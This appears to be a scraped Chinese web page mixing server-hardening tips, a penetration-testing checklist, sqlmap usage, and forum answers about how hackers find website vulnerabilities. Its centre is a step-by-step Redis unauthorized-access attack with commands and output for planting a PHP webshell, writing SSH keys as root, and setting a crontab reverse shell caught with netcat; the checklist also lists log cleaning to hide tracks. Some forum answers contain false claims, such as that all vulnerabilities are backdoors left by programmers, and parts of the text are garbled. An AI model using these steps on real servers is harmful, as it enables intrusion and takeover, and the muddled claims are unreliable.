2、关闭不必要的服务和端口。
3、整体扫描下服务器,看下存在什么问题,有漏洞及时打补丁;检查是否有影子账户,不是自己建立的账号;内容是否又被修改的痕迹等,如果发现问题及时进行清理。
4、重新设置账户密码,密码设置的复杂些;以及设置账户权限。
5、对服务器上的安全软件进行升级,或者是对防护参数进行重新设置,使他符合当时的环境。如果服务器上没有安装防护软件,可以看下服务器安全狗和网站安全狗。还可以将服务器添加到安全狗服云平台上,这样当有攻击发生时,可以快速知道,并进行处理等。
信息收集
1,获取域名的whois信息,获取注册者邮箱姓名电话等。
2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。
3,查看服务器 *** 作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞
4,查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如rsync,心脏出血,mysql,ftp,ssh弱口令等。
5,扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针
6,googlehack进一步探测网站的信息,后台,敏感文件
漏洞扫描
开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等
漏洞利用
利用以上的方式拿到webshell,或者其他权限
权限提升
提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞
linux藏牛漏洞,linux内核版本漏洞提权,linux下的mysqlsystem提权以及oracle低权限提权
日志清理
总结报告及修复方案
sqlmap,怎么对一个注入点注入?
1)如果是get型号,直接,sqlmap-u"诸如点网址"
2)如果是post型诸如点,可以sqlmap-u"注入点网址”--data="post的参数"
3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用号替换,放到文件里,然后sqlmap-r"文件地址"
nmap,扫描的几种方式
sql注入的几种类型?
1)报错注入
2)bool型注入
3)延时注入
4)宽字节注入
总结一下redis未授权拿shell:redis-cli -h ip
Windows:
1找网站绝对路径
2config set dir 绝对路径根路径
config get dir
config set dbfilename indexbakphp
set webshell "<php phpinfo();>"
save
Linux系统:
第一种:写密钥
第二种:写crotab反dshell
第三种:找绝对路径写webshell
1)本地生成秘钥
root@GanDolf :~# ssh-keygen -t rsa
2)将公钥写入一个文件
root@GanDolf :~# cd /root/ssh/
root@GanDolf :~/ssh# (echo -e "\n\n"; cat id_rsapub; echo -e "\n\n") > footxt
3)连接redis写入文件 root@GanDolf :~/ssh# cat footxt | redis-cli -h 2107390xxx -x set crackit
OK
root@GanDolf :~/ssh# redis-cli -h 2107390xxx
2107390xxx:6379> config set dir /root/ssh/
OK
(139s)
2107390xxx:6379> CONFIG GET dir
4)连接服务器
root@GanDolf :~/ssh# ssh -i id_rsa root@2107390xxx
二、 利用方式不需要猜 web路径,写到cron里面
然后本机nc -lvv 2333
一会儿shell就d回来了。
修复建议:
1)修改默认端口
2)监听本地端口
3)使用非root启动,否则出现漏洞1,直接拿到root权限
4)修改配置文件,禁用相关命令问题一:黑客怎么寻找网站漏洞,麻烦说一下! 拿站这技术活得靠点经验,我简单说下吧(我是菜鸟)。之前,很多网站一恭存在注入漏洞,就像一楼那样说的,很多菜菜都是用啊D,明小子等软件(本人绝无看不起软件作者之意,打心底佩服前辈们),但是现在随着国家发展强大,人民的生活水平提高,很多管理员动不动就装个防注系统(绕过防注这里我不说),以前 *** 起工具就日下一大堆站的日子一去不复返了。有些管理员粗心,导致出现上传漏洞,虽然过滤很严,但是这样的漏洞一般比较致命,或者人家防火墙很厉害,马儿进一匹死一匹,这种漏洞一般是通过扫描出来的。也有一些管理员没有改密码,通过弱口令直接进去后台,还有一些后台页面直接爆出密码(很久了),还有就是爆库,数据库被爆出来~很多很多,说不完~望楼主采纳。
问题二:黑客是如何发现系统漏洞的,系统为什么会有漏洞? 不要为难微软,毕竟微软写WINDOWS的家伙们也都是人,虽然不是中国人。
只要是人做出来的东西,就没有完美的,所以有问题也不奇怪。
这就好像一个打字员打了一篇稿子,打字员本身发现错字的可能性很小,倒是别人一眼就可以看到打字员打错的字。
虽然不知道这是为什么,但真的是这样。(以前我打字的时候就发现不到自己的错字)
至于你的问题,微软当初在编写系统的时候为什么不知道有漏洞?
回答:很多所谓的漏洞都不算是漏洞,都是正常的数据值,所以不容易被发现。
举个例子,在检测一些ASP网站的时候,会用到1=1 OR 1=2 之类的语句,
这本身是ASP的一种正常的程序语句,但是到了黑客手中,就成了检测ASP网站的重要检查项目,
黑客会根据检测网站返回的数据值,而得到大量的信息。
有的黑客可以自己发现漏洞,他们是靠什么技术发现的?
回答:说实话,这个问题我个人觉得问题很好。
黑客一词,在以前的时候,是用来形容懂得计算机编程,拥供很好的计算机技术并且热心于钻研计算机技术的人
对于这种人,发现一些漏洞也是很正常的,就好像WIN2000的输入法漏洞,就是中国人发现的。
其实只要你用某种系统习惯了,也会发现很多漏洞。比如XP,现在盗版的XP漏洞很多,只要你细心点,
你就会发现很多的XP漏洞。
问题三:如何看一个网站有没有漏洞、有什么漏洞? 没有一定足够的程序能力没有一定的网络安全经验你是无法胆接判断的,
对于这些初级菜鸟,只能借助检测工具来初略判断。
问题四:黑客是怎么样去攻击网站的,漏洞是怎么发现的? 网上所谓黑客入侵某某网站,都是根据目前公开的漏洞或者根据别人发掘的漏洞进行入侵的,入侵了后台就把木马后门上传服务器内,实现控制目的,黑客攻击网站主要是发送大量数据包,让网站不能正常访问等,本人收徒,学会再收费!
问题五:如何扫描网站的漏洞? 需要确定他使用的服务器版本,还需要了解他的安全措施。他开了定0端口,至少可以D。O。S。PS:小心触犯法律!
问题六:怎样才能找到网站漏洞 怎么说那 是没有检测出来漏洞 才导致的
网站作了很好的硬件防火墙
没办法拉
这可是不道德的 注意
问题七:入侵网站的漏洞是怎么生成的? 为什么会有漏洞呢、谢谢了,大神帮忙啊 你好。楼主,关于你的这个问题很高兴我来替你回答 所有网站和软件的一般刚刚开始的时候是没有多大问题的漏洞的,一般程序员在设定软件的时候都是把软件和网站分成模块来做的,分为模块1 或者模块ABCD 这样来的,每个软件和网站都有后门的,因为这样方便程序员测试网站,和所有的黑客一样,入侵网站都是先找后门,利用后门程序向你的服务器发送大量邮件,这就是垃圾信息邮件攻击法,让你的服务器被信息撑爆,卡死,甚至瘫痪,第2种就是特洛伊木马,向你的服务器发送邮件,并带上木马程序,只要你运行了邮件中的附带件,那么,木马就会潜入你的服务器程序,在你不知不觉中得到他想要的信息,第3种就是直接发送网络炸d到你的 服务器使你的服务器瘫痪死机,这种方法 很不人道,所以一半人不会用这种!其实漏洞就是所谓的后门,所有软件和网站的后门都是程序员留着的。这样也并不是说他们有什么不良企图,而是方便他们日后对软件或者网站进行测试,修改,所以一般的程序员都会把这后门留着,后门如果被有不良企图的人知道了,那么就成了所谓的漏洞了。 如果楼主对我的回答还满意的话,可以用五星来采为满意答案
问题八:网站怎样样检查漏洞 您好,现在一般是使用站长工具,我现在用了百度站长工具,如果网站有问题,系统会提示的,而且可以使用漏洞检查软件或在线工具直接可以检测,还有就是如果是大型网站可以考虑做加密,加强网站的安全性能。工具您可以百度看看。
问题九:网络怎么学习找漏洞。 这是我在网上看到的,希望对楼住有所帮助一 如何寻找漏洞
这个是大家最关心的。大家寻找漏洞只能寻找能读到源代码码的,没有源代码但有注入漏洞的系统只能猜,具有特殊性。网上很多主机用的是成品,它的系统源代码可以从网上下到。至于如何判断主机用的是哪个系统,就需要大家有一定的积累了。这也没法用语言描述,我举个简单的例子。
以动网6为例,看到某个论坛界面酷似动网,9成是动网论坛,再看看下面的版本就知道是动网6了。这个时候就可以去Chinaz下个动网6来读一下,不会ASP的就没办法了。当然漏洞早就公布,我只是告诉大家如何判断主机用哪个WEB系统。
漏洞是如何被发现的呢?其实也没什么诀窍,主要是扎实的基础知识,要是连>
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)